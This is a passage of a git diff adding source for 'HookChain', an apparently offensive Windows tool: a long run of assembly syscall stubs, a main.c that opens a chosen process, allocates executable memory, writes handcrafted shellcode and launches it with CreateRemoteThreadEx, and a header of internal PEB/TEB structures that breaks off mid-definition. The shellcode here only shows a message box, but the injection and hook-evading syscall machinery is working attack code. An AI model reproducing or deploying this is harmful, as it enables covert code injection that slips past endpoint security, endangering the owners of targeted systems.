+        mov rax, SyscallExec
+        push rax
+        mov rax, 01b7h
+        ret
+        nop
+    Fnc01B7 ENDP
+
+    Fnc01B8 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01b8h
+        ret
+        nop
+    Fnc01B8 ENDP
+
+    Fnc01B9 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01b9h
+        ret
+        nop
+    Fnc01B9 ENDP
+
+    Fnc01BA PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01bah
+        ret
+        nop
+    Fnc01BA ENDP
+
+    Fnc01BB PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01bbh
+        ret
+        nop
+    Fnc01BB ENDP
+
+    Fnc01BC PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01bch
+        ret
+        nop
+    Fnc01BC ENDP
+
+    Fnc01BD PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01bdh
+        ret
+        nop
+    Fnc01BD ENDP
+
+    Fnc01BE PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01beh
+        ret
+        nop
+    Fnc01BE ENDP
+
+    Fnc01BF PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01bfh
+        ret
+        nop
+    Fnc01BF ENDP
+
+    Fnc01C0 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01c0h
+        ret
+        nop
+    Fnc01C0 ENDP
+
+    Fnc01C1 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01c1h
+        ret
+        nop
+    Fnc01C1 ENDP
+
+    Fnc01C2 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01c2h
+        ret
+        nop
+    Fnc01C2 ENDP
+
+    Fnc01C3 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01c3h
+        ret
+        nop
+    Fnc01C3 ENDP
+
+    Fnc01C4 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01c4h
+        ret
+        nop
+    Fnc01C4 ENDP
+
+    Fnc01C5 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01c5h
+        ret
+        nop
+    Fnc01C5 ENDP
+
+    Fnc01C6 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01c6h
+        ret
+        nop
+    Fnc01C6 ENDP
+
+    Fnc01C7 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01c7h
+        ret
+        nop
+    Fnc01C7 ENDP
+
+    Fnc01C8 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01c8h
+        ret
+        nop
+    Fnc01C8 ENDP
+
+    Fnc01C9 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01c9h
+        ret
+        nop
+    Fnc01C9 ENDP
+
+    Fnc01CA PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01cah
+        ret
+        nop
+    Fnc01CA ENDP
+
+    Fnc01CB PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01cbh
+        ret
+        nop
+    Fnc01CB ENDP
+
+    Fnc01CC PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01cch
+        ret
+        nop
+    Fnc01CC ENDP
+
+    Fnc01CD PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01cdh
+        ret
+        nop
+    Fnc01CD ENDP
+
+    Fnc01CE PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01ceh
+        ret
+        nop
+    Fnc01CE ENDP
+
+    Fnc01CF PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01cfh
+        ret
+        nop
+    Fnc01CF ENDP
+
+    Fnc01D0 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01d0h
+        ret
+        nop
+    Fnc01D0 ENDP
+
+    Fnc01D1 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01d1h
+        ret
+        nop
+    Fnc01D1 ENDP
+
+    Fnc01D2 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01d2h
+        ret
+        nop
+    Fnc01D2 ENDP
+
+    Fnc01D3 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01d3h
+        ret
+        nop
+    Fnc01D3 ENDP
+
+    Fnc01D4 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01d4h
+        ret
+        nop
+    Fnc01D4 ENDP
+
+    Fnc01D5 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01d5h
+        ret
+        nop
+    Fnc01D5 ENDP
+
+    Fnc01D6 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01d6h
+        ret
+        nop
+    Fnc01D6 ENDP
+
+    Fnc01D7 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01d7h
+        ret
+        nop
+    Fnc01D7 ENDP
+
+    Fnc01D8 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01d8h
+        ret
+        nop
+    Fnc01D8 ENDP
+
+    Fnc01D9 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01d9h
+        ret
+        nop
+    Fnc01D9 ENDP
+
+    Fnc01DA PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01dah
+        ret
+        nop
+    Fnc01DA ENDP
+
+    Fnc01DB PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01dbh
+        ret
+        nop
+    Fnc01DB ENDP
+
+    Fnc01DC PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01dch
+        ret
+        nop
+    Fnc01DC ENDP
+
+    Fnc01DD PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01ddh
+        ret
+        nop
+    Fnc01DD ENDP
+
+    Fnc01DE PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01deh
+        ret
+        nop
+    Fnc01DE ENDP
+
+    Fnc01DF PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01dfh
+        ret
+        nop
+    Fnc01DF ENDP
+
+    Fnc01E0 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01e0h
+        ret
+        nop
+    Fnc01E0 ENDP
+
+    Fnc01E1 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01e1h
+        ret
+        nop
+    Fnc01E1 ENDP
+
+    Fnc01E2 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01e2h
+        ret
+        nop
+    Fnc01E2 ENDP
+
+    Fnc01E3 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01e3h
+        ret
+        nop
+    Fnc01E3 ENDP
+
+    Fnc01E4 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01e4h
+        ret
+        nop
+    Fnc01E4 ENDP
+
+    Fnc01E5 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01e5h
+        ret
+        nop
+    Fnc01E5 ENDP
+
+    Fnc01E6 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01e6h
+        ret
+        nop
+    Fnc01E6 ENDP
+
+    Fnc01E7 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01e7h
+        ret
+        nop
+    Fnc01E7 ENDP
+
+    Fnc01E8 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01e8h
+        ret
+        nop
+    Fnc01E8 ENDP
+
+    Fnc01E9 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01e9h
+        ret
+        nop
+    Fnc01E9 ENDP
+
+    Fnc01EA PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01eah
+        ret
+        nop
+    Fnc01EA ENDP
+
+    Fnc01EB PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01ebh
+        ret
+        nop
+    Fnc01EB ENDP
+
+    Fnc01EC PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01ech
+        ret
+        nop
+    Fnc01EC ENDP
+
+    Fnc01ED PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01edh
+        ret
+        nop
+    Fnc01ED ENDP
+
+    Fnc01EE PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01eeh
+        ret
+        nop
+    Fnc01EE ENDP
+
+    Fnc01EF PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01efh
+        ret
+        nop
+    Fnc01EF ENDP
+
+    Fnc01F0 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01f0h
+        ret
+        nop
+    Fnc01F0 ENDP
+
+    Fnc01F1 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01f1h
+        ret
+        nop
+    Fnc01F1 ENDP
+
+    Fnc01F2 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01f2h
+        ret
+        nop
+    Fnc01F2 ENDP
+
+    Fnc01F3 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01f3h
+        ret
+        nop
+    Fnc01F3 ENDP
+
+    Fnc01F4 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01f4h
+        ret
+        nop
+    Fnc01F4 ENDP
+
+    Fnc01F5 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01f5h
+        ret
+        nop
+    Fnc01F5 ENDP
+
+    Fnc01F6 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01f6h
+        ret
+        nop
+    Fnc01F6 ENDP
+
+    Fnc01F7 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01f7h
+        ret
+        nop
+    Fnc01F7 ENDP
+
+    Fnc01F8 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01f8h
+        ret
+        nop
+    Fnc01F8 ENDP
+
+    Fnc01F9 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01f9h
+        ret
+        nop
+    Fnc01F9 ENDP
+
+    Fnc01FA PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01fah
+        ret
+        nop
+    Fnc01FA ENDP
+
+    Fnc01FB PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01fbh
+        ret
+        nop
+    Fnc01FB ENDP
+
+    Fnc01FC PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01fch
+        ret
+        nop
+    Fnc01FC ENDP
+
+    Fnc01FD PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01fdh
+        ret
+        nop
+    Fnc01FD ENDP
+
+    Fnc01FE PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01feh
+        ret
+        nop
+    Fnc01FE ENDP
+
+    Fnc01FF PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01ffh
+        ret
+        nop
+    Fnc01FF ENDP
+
+
+end
diff --git a/HookChain/HookChain/main.c b/HookChain/HookChain/main.c
new file mode 100644
index 0000000..f7d20c0
--- /dev/null
+++ b/HookChain/HookChain/main.c
@@ -0,0 +1,172 @@
+#pragma once
+
+#include <stdio.h>
+#include <Windows.h>
+
+#include "hook.h"
+
+INT wmain(int argc, char* argv[])
+{
+	NTSTATUS status;
+	PVOID shellAddress = NULL;
+	HANDLE hProcess = (HANDLE)-1;
+	DWORD dwPID = 0;
+	
+	if (argc >= 2)
+	{
+		dwPID = _wtoi(argv[1]);
+		if (dwPID == 0)
+			dwPID = atoi(argv[1]);
+	}
+
+	if (dwPID == 0) {
+		char cPid[7];
+
+		printf("Type the pid: \n");
+		fgets(cPid, sizeof(cPid), stdin);
+		dwPID = _wtoi(cPid);
+		if (dwPID == 0)
+			dwPID = atoi(cPid);
+	}
+
+	if (dwPID == 0) {
+		printf("[!] Failed to get PID\n");
+		return 1;
+	}
+
+	printf("\n[+] Creating HookChain implants\n");
+	if (!InitApi()) {
+		printf("[!] Failed to initialize API\n");
+		return 1;
+	}
+
+	printf("\n[+] HookChain implanted! \\o/\n\n");
+
+
+    printf("[*] Creating Handle onto PID %d\n", dwPID);
+
+    POBJECT_ATTRIBUTES objectAttributes = (POBJECT_ATTRIBUTES)RtlAllocateHeapStub(RtlProcessHeap(), HEAP_ZERO_MEMORY, sizeof(OBJECT_ATTRIBUTES));
+    PCLIENT_ID clientId = (PCLIENT_ID)RtlAllocateHeapStub(RtlProcessHeap(), HEAP_ZERO_MEMORY, sizeof(CLIENT_ID));
+    clientId->UniqueProcess = dwPID;
+    if (!NT_SUCCESS(NtOpenProcess(&hProcess, PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD, objectAttributes, clientId))) {
+        printf("[!] Failed to call OP: Status = 0x%08lx\n", GetLastError());
+        return 1;
+    }
+
+    printf("[*] Allocating memory at Handle 0x%p\n", hProcess);
+
+    SIZE_T memSize = 0x1000;
+    if (!NT_SUCCESS(NtAllocateVirtualMemory(hProcess, &shellAddress, 0, &memSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READ))) {
+        printf("[!] Failed to call VA(shellAddress): Status = 0x%08lx\n", GetLastError());
+        return 1;
+    }
+
+    printf("[*] Injecting remote shellcode\n");
+
+    //Write Caption and Text to memory address of remote process
+    TCHAR Text[] = TEXT("Message Box created from HookChain");
+    TCHAR Caption[] = TEXT("Process injected MessageBox");
+
+    FARPROC fpText = (FARPROC)((PBYTE)shellAddress + 0x100);
+    FARPROC fpCaption = (FARPROC)((PBYTE)shellAddress + 0x200);
+    PVOID pText = &fpText;
+    PVOID pCaption = &fpCaption;
+
+    if (!WriteProcessMemory(hProcess, fpText, (LPCVOID)Text, sizeof(Text), NULL)) {
+        printf("[!] Failed to call WPM(Text): Status = 0x%08lx\n", GetLastError());
+        return 1;
+    }
+
+    if (!WriteProcessMemory(hProcess, fpCaption, (LPCVOID)Caption, sizeof(Caption), NULL)) {
+        printf("[!] Failed to call WPM(Caption): Status = 0x%08lx\n", GetLastError());
+        return 1;
+    }
+
+#ifdef UNICODE
+    PVOID pfMessageBox = HGetProcAddress2("User32", "MessageBoxW");
+    PVOID pMessageBox = &pfMessageBox;
+#else
+    FARPROC pfMessageBox = HGetProcAddress2("User32", "MessageBoxA");
+    PVOID pMessageBox = &pfMessageBox;
+#endif
+
+    PVOID fpTerminateThread = HGetProcAddress2("Kernel32", "TerminateThread");
+    PVOID pTerminateThread = &fpTerminateThread;
+
+    /*
+    int MessageBox(HWND hWnd, LPCTSTR lpText, LPCTSTR lpCaption, UINT uType);
+
+    uType:
+        MB_OK = 0x00000000L
+        MB_ICONWARNING = 0x00000030L
+        MB_TOPMOST = 0x00040000L
+        MB_SETFOREGROUND = 0x00010000L
+
+    BOOL TerminateThread(HANDLE hThread, DWORD  dwExitCode);
+
+    */
+
+    unsigned char p1[] = {
+        //0xcc,
+        0x55																	// push   rbp
+        , 0x48, 0x89, 0xe5  													// mov    rbp,rsp
+
+        , 0xfc                                                                  // cld 
+        , 0x48, 0x83, 0xe4, 0xf0												// and    rsp, 0xfffffffffffffff0 
+
+        , 0x48, 0x31, 0xc0														// xor    rax,rax
+        , 0x48, 0x89, 0xc1														// mov    rcx,rax
+
+        , 0x48, 0xba,*((PBYTE)pText),*((PBYTE)pText + 1),*((PBYTE)pText + 2),*((PBYTE)pText + 3),*((PBYTE)pText + 4),*((PBYTE)pText + 5),*((PBYTE)pText + 6),*((PBYTE)pText + 7)							// mov rdx, ...
+        , 0x49, 0xb8,*((PBYTE)pCaption),*((PBYTE)pCaption + 1),*((PBYTE)pCaption + 2),*((PBYTE)pCaption + 3),*((PBYTE)pCaption + 4),*((PBYTE)pCaption + 5),*((PBYTE)pCaption + 6),*((PBYTE)pCaption + 7)	// mov r8, ...
+        , 0x41, 0xb9, 0x30, 0x00, 0x05, 0x00									// mov    r9,0x30  => MB_OK | MB_ICONWARNING | MB_TOPMOST | MB_SETFOREGROUND
+
+        , 0x48, 0x83, 0xec, 0x20												// sub    rsp,0x20
+        , 0x48, 0x89, 0x04, 0x24												// mov    QWORD PTR [rsp],rax
+        , 0x48, 0x89, 0x44, 0x24, 0x08											// mov    QWORD PTR [rsp+0x8],rax
+        , 0x48, 0x89, 0x44, 0x24, 0x10											// mov    QWORD PTR [rsp+0x10],rax
+        , 0x48, 0x89, 0x44, 0x24, 0x18											// mov    QWORD PTR [rsp+0x18],rax
+
+        , 0x48, 0xb8,*((PBYTE)pMessageBox),*((PBYTE)pMessageBox + 1),*((PBYTE)pMessageBox + 2),*((PBYTE)pMessageBox + 3),*((PBYTE)pMessageBox + 4),*((PBYTE)pMessageBox + 5),*((PBYTE)pMessageBox + 6),*((PBYTE)pMessageBox + 7)	// mov rax ...
+        , 0xff, 0xd0															// call   rax
+
+        , 0x48, 0x31, 0xc0														// xor    rax,rax
+
+        , 0x48, 0x89, 0xc1														// mov    rcx,rax
+        , 0x48, 0xff, 0xc9														// dec    rcx
+        , 0x48, 0x89, 0xc2														// mov    rdx,rax
+        , 0x48, 0x83, 0xec, 0x20												// sub    rsp,0x20
+        , 0x48, 0x89, 0x04, 0x24												// mov    QWORD PTR [rsp],rax
+        , 0x48, 0x89, 0x44, 0x24, 0x08											// mov    QWORD PTR [rsp+0x8],rax
+        , 0x48, 0x89, 0x44, 0x24, 0x10											// mov    QWORD PTR [rsp+0x10],rax
+        , 0x48, 0x89, 0x44, 0x24, 0x18											// mov    QWORD PTR [rsp+0x18],rax
+
+        , 0x48, 0xb8,*((PBYTE)pTerminateThread),*((PBYTE)pTerminateThread + 1),*((PBYTE)pTerminateThread + 2),*((PBYTE)pTerminateThread + 3),*((PBYTE)pTerminateThread + 4),*((PBYTE)pTerminateThread + 5),*((PBYTE)pTerminateThread + 6),*((PBYTE)pTerminateThread + 7)	// mov rax ...
+        , 0xff, 0xd0															// call   rax
+
+        , 0x48, 0x89, 0xec  													// mov    rsp,rbp
+        , 0x5d																	// pop    rbp
+        , 0xc3																	// ret
+
+        , 0xcc, 0xcc, 0xcc														// INT3
+    };
+
+    if (!WriteProcessMemory(hProcess, shellAddress, (LPCVOID)p1, sizeof(p1), NULL)) {
+        printf("[!] Failed to call WriteProcessMemory(Shellcode): Status = 0x%08lx\n", GetLastError());
+    }
+
+    printf("[*] Calling CreateRemoteThreadEx\n");
+    HANDLE hThread = CreateRemoteThreadEx(hProcess, NULL, NULL, (LPTHREAD_START_ROUTINE)shellAddress, NULL, NULL, NULL, NULL);
+    if (hThread == NULL) {
+        printf("[!] Failed to call CRT: Status = 0x%08lx\n", GetLastError());
+        return 1;
+    }
+
+    //Disable Hook prints
+    SetDebug(FALSE);
+
+    printf("[+] Shellcode OK!\n");
+    printf("\n\n _     _  _____   _____  _     _ _______ _     _ _______ _____ __   _\n |_____| |     | |     | |____/  |       |_____| |_____|   |   | \\  |\n |     | |_____| |_____| |    \\_ |_____  |     | |     | __|__ |  \\_|\n                                                          By M4v3r1ck\n\n");
+    return 0x00;
+
+}
diff --git a/HookChain/HookChain/windows_common.h b/HookChain/HookChain/windows_common.h
new file mode 100644
index 0000000..da37ff7
--- /dev/null
+++ b/HookChain/HookChain/windows_common.h
@@ -0,0 +1,393 @@
+//===============================================================================================//
+#ifndef _OKCHAIN_WINDOWS_COMMON_H
+#define _OKCHAIN_WINDOWS_COMMON_H
+//===============================================================================================//
+#define WIN32_LEAN_AND_MEAN
+#include <windows.h>
+#include <ntstatus.h>
+
+#if defined _M_X64
+#define WIN_X64
+#elif defined _M_IX86
+#define WIN_X86
+#endif
+
+#define DLL_QUERY_HMODULE     6
+
+#define DEREF( name )*(UINT_PTR *)(name)
+#define DEREF_64( name )*(DWORD64 *)(name)
+#define DEREF_32( name )*(DWORD *)(name)
+#define DEREF_16( name )*(WORD *)(name)
+#define DEREF_8( name )*(BYTE *)(name)
+
+#define DLLEXPORT   __declspec( dllexport ) 
+
+#define NT_SUCCESS(x) ((x) == 0)
+#define RVA2OFFSET(Type, DllBase, CpBase, CpVa, Rva) (Type)((ULONG_PTR)CpBase + (((ULONG_PTR)DllBase + Rva) - (ULONG_PTR)CpVa))
+#define OFFSET2RVA(DllBase, CpBase, CpVa, OffsetVa) (DWORD)( (DWORD_PTR)CpVa + ((DWORD_PTR)OffsetVa - (DWORD_PTR)CpBase) - (DWORD_PTR)DllBase )
+#define RVA2RAW(Type, DllBase, SectionRva, SectionPointerToRawData, Rva) (Type)((ULONG_PTR)DllBase + ((ULONG_PTR)Rva - (ULONG_PTR)SectionRva) + (ULONG_PTR)SectionPointerToRawData)
+
+typedef struct _LSA_UNICODE_STRING {
+	USHORT Length;
+	USHORT MaximumLength;
+	PWSTR  Buffer;
+} LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING, * PUNICODE_STR;
+
+typedef struct _LDR_MODULE {
+	LIST_ENTRY              InLoadOrderModuleList;
+	LIST_ENTRY              InMemoryOrderModuleList;
+	LIST_ENTRY              InInitializationOrderModuleList;
+	PVOID                   BaseAddress;
+	PVOID                   EntryPoint;
+	ULONG                   SizeOfImage;
+	UNICODE_STRING          FullDllName;
+	UNICODE_STRING          BaseDllName;
+	ULONG                   Flags;
+	SHORT                   LoadCount;
+	SHORT                   TlsIndex;
+	LIST_ENTRY              HashTableEntry;
+	ULONG                   TimeDateStamp;
+} LDR_MODULE, * PLDR_MODULE;
+
+typedef struct _PEB_LDR_DATA {
+	ULONG                   Length;
+	ULONG                   Initialized;
+	PVOID                   SsHandle;
+	LIST_ENTRY              InLoadOrderModuleList;
+	LIST_ENTRY              InMemoryOrderModuleList;
+	LIST_ENTRY              InInitializationOrderModuleList;
+} PEB_LDR_DATA, * PPEB_LDR_DATA;
+
+typedef struct _PEB {
+	BOOLEAN                 InheritedAddressSpace;
+	BOOLEAN                 ReadImageFileExecOptions;
+	BOOLEAN                 BeingDebugged;
+	BOOLEAN                 Spare;
+	HANDLE                  Mutant;
+	PVOID                   ImageBase;
+	PPEB_LDR_DATA           LoaderData;
+	PVOID                   ProcessParameters;
+	PVOID                   SubSystemData;
+	PVOID                   ProcessHeap;
+	PVOID                   FastPebLock;
+	PVOID                   FastPebLockRoutine;
+	PVOID                   FastPebUnlockRoutine;
+	ULONG                   EnvironmentUpdateCount;
+	PVOID* KernelCallbackTable;
+	PVOID                   EventLogSection;
+	PVOID                   EventLog;
+	PVOID                   FreeList;
+	ULONG                   TlsExpansionCounter;
+	PVOID                   TlsBitmap;
+	ULONG                   TlsBitmapBits[0x2];
+	PVOID                   ReadOnlySharedMemoryBase;
+	PVOID                   ReadOnlySharedMemoryHeap;
+	PVOID* ReadOnlyStaticServerData;
+	PVOID                   AnsiCodePageData;
+	PVOID                   OemCodePageData;
+	PVOID                   UnicodeCaseTableData;
+	ULONG                   NumberOfProcessors;
+	ULONG                   NtGlobalFlag;
+	BYTE                    Spare2[0x4];
+	LARGE_INTEGER           CriticalSectionTimeout;
+	ULONG                   HeapSegmentReserve;
+	ULONG                   HeapSegmentCommit;
+	ULONG                   HeapDeCommitTotalFreeThreshold;
+	ULONG                   HeapDeCommitFreeBlockThreshold;
+	ULONG                   NumberOfHeaps;
+	ULONG                   MaximumNumberOfHeaps;
+	PVOID** ProcessHeaps;
+	PVOID                   GdiSharedHandleTable;
+	PVOID                   ProcessStarterHelper;
+	PVOID                   GdiDCAttributeList;
+	PVOID                   LoaderLock;
+	ULONG                   OSMajorVersion;
+	ULONG                   OSMinorVersion;
+	ULONG                   OSBuildNumber;
+	ULONG                   OSPlatformId;
+	ULONG                   ImageSubSystem;
+	ULONG                   ImageSubSystemMajorVersion;
+	ULONG                   ImageSubSystemMinorVersion;
+	ULONG                   GdiHandleBuffer[0x22];
+	ULONG                   PostProcessInitRoutine;
+	ULONG                   TlsExpansionBitmap;
+	BYTE                    TlsExpansionBitmapBits[0x80];
+	ULONG                   SessionId;
+} PEB, * PPEB;
+
+typedef struct __CLIENT_ID {
+	HANDLE UniqueProcess;
+	HANDLE UniqueThread;
+} CLIENT_ID, * PCLIENT_ID;
+
+typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
+	ULONG Flags;
+	PCHAR FrameName;
+} TEB_ACTIVE_FRAME_CONTEXT, * PTEB_ACTIVE_FRAME_CONTEXT;
+
+typedef struct _TEB_ACTIVE_FRAME {
+	ULONG Flags;
+	struct _TEB_ACTIVE_FRAME* Previous;
+	PTEB_ACTIVE_FRAME_CONTEXT Context;
+} TEB_ACTIVE_FRAME, * PTEB_ACTIVE_FRAME;
+
+typedef struct _GDI_TEB_BATCH {
+	ULONG Offset;
+	ULONG HDC;
+	ULONG Buffer[310];
+} GDI_TEB_BATCH, * PGDI_TEB_BATCH;
+
+typedef PVOID PACTIVATION_CONTEXT;
+
+typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
+	struct __RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous;
+	PACTIVATION_CONTEXT ActivationContext;
+	ULONG Flags;
+} RTL_ACTIVATION_CONTEXT_STACK_FRAME, * PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
+
+typedef struct _ACTIVATION_CONTEXT_STACK {
+	PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
+	LIST_ENTRY FrameListCache;
+	ULONG Flags;
+	ULONG NextCookieSequenceNumber;
+	ULONG StackId;
+} ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK;
+
+typedef struct _TEB {
+	NT_TIB				NtTib;
+	PVOID				EnvironmentPointer;
+	CLIENT_ID			ClientId;
+	PVOID				ActiveRpcHandle;
+	PVOID				ThreadLocalStoragePointer;
+	PPEB				ProcessEnvironmentBlock;
+	ULONG               LastErrorValue;
+	ULONG               CountOfOwnedCriticalSections;
+	PVOID				CsrClientThread;
+	PVOID				Win32ThreadInfo;
+	ULONG               User32Reserved[26];
+	ULONG               UserReserved[5];
+	PVOID				WOW32Reserved;
+	LCID                CurrentLocale;
+	ULONG               FpSoftwareStatusRegister;
+	PVOID				SystemReserved1[54];
+	LONG                ExceptionCode;
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+	PACTIVATION_CONTEXT_STACK* ActivationContextStackPointer;
+	UCHAR                  SpareBytes1[0x30 - 3 * sizeof(PVOID)];
+	ULONG                  TxFsContext;
+#elif (NTDDI_VERSION >= NTDDI_WS03)
+	PACTIVATION_CONTEXT_STACK ActivationContextStackPointer;
+	UCHAR                  SpareBytes1[0x34 - 3 * sizeof(PVOID)];
+#else
+	ACTIVATION_CONTEXT_STACK ActivationContextStack;
+	UCHAR                  SpareBytes1[24];
+#endif
+	GDI_TEB_BATCH			GdiTebBatch;
+	CLIENT_ID				RealClientId;
+	PVOID					GdiCachedProcessHandle;
+	ULONG                   GdiClientPID;
+	ULONG                   GdiClientTID;
+	PVOID					GdiThreadLocalInfo;
+	PSIZE_T					Win32ClientInfo[62];
+	PVOID					glDispatchTable[233];
+	PSIZE_T					glReserved1[29];
+	PVOID					glReserved2;
+	PVOID					glSectionInfo;
+	PVOID					glSection;
+	PVOID					glTable;
+	PVOID					glCurrentRC;
+	PVOID					glContext;
+	NTSTATUS                LastStatusValue;
+	UNICODE_STRING			StaticUnicodeString;
+	WCHAR                   StaticUnicodeBuffer[261];
+	PVOID					DeallocationStack;
+	PVOID					TlsSlots[64];
+	LIST_ENTRY				TlsLinks;
+	PVOID					Vdm;
+	PVOID					ReservedForNtRpc;
+	PVOID					DbgSsReserved[2];
+#if (NTDDI_VERSION >= NTDDI_WS03)
+	ULONG                   HardErrorMode;
+#else
+	ULONG                  HardErrorsAreDisabled;
+#endif
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+	PVOID					Instrumentation[13 - sizeof(GUID) / sizeof(PVOID)];
+	GUID                    ActivityId;
+	PVOID					SubProcessTag;
+	PVOID					EtwLocalData;
+	PVOID					EtwTraceData;
+#elif (NTDDI_VERSION >= NTDDI_WS03)
+	PVOID					Instrumentation[14];
+	PVOID					SubProcessTag;
+	PVOID					EtwLocalData;
+#else
+	PVOID					Instrumentation[16];
+#endif
+	PVOID					WinSockData;
+	ULONG					GdiBatchCount;
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+	BOOLEAN                SpareBool0;
+	BOOLEAN                SpareBool1;
+	BOOLEAN                SpareBool2;
+#else
+	BOOLEAN                InDbgPrint;
+	BOOLEAN                FreeStackOnTermination;
+	BOOLEAN                HasFiberData;
+#endif
+	UCHAR                  IdealProcessor;
+#if (NTDDI_VERSION >= NTDDI_WS03)
+	ULONG                  GuaranteedStackBytes;
+#else
+	ULONG                  Spare3;
+#endif
+	PVOID				   ReservedForPerf;
+	PVOID				   ReservedForOle;
+	ULONG                  WaitingOnLoaderLock;
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+	PVOID				   SavedPriorityState;
+	ULONG_PTR			   SoftPatchPtr1;
+	ULONG_PTR			   ThreadPoolData;
+#elif (NTDDI_VERSION >= NTDDI_WS03)
+	ULONG_PTR			   SparePointer1;
+	ULONG_PTR              SoftPatchPtr1;
+	ULONG_PTR              SoftPatchPtr2;
+#else
+	Wx86ThreadState        Wx86Thread;
+#endif
+	PVOID* TlsExpansionSlots;
+#if defined(_WIN64) && !defined(EXPLICIT_32BIT)
+	PVOID                  DeallocationBStore;
+	PVOID                  BStoreLimit;
+#endif
+	ULONG                  ImpersonationLocale;
+	ULONG                  IsImpersonating;
+	PVOID                  NlsCache;
+	PVOID                  pShimData;
+	ULONG                  HeapVirtualAffinity;
+	HANDLE                 CurrentTransactionHandle;
+	PTEB_ACTIVE_FRAME      ActiveFrame;
+#if (NTDDI_VERSION >= NTDDI_WS03)
+	PVOID FlsData;
+#endif
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+	PVOID PreferredLangauges;
+	PVOID UserPrefLanguages;
+	PVOID MergedPrefLanguages;
+	ULONG MuiImpersonation;
+	union
+	{
+		struct
+		{
+			USHORT SpareCrossTebFlags : 16;
+		};
+		USHORT CrossTebFlags;
+	};
+	union
+	{
+		struct
+		{
+			USHORT DbgSafeThunkCall : 1;
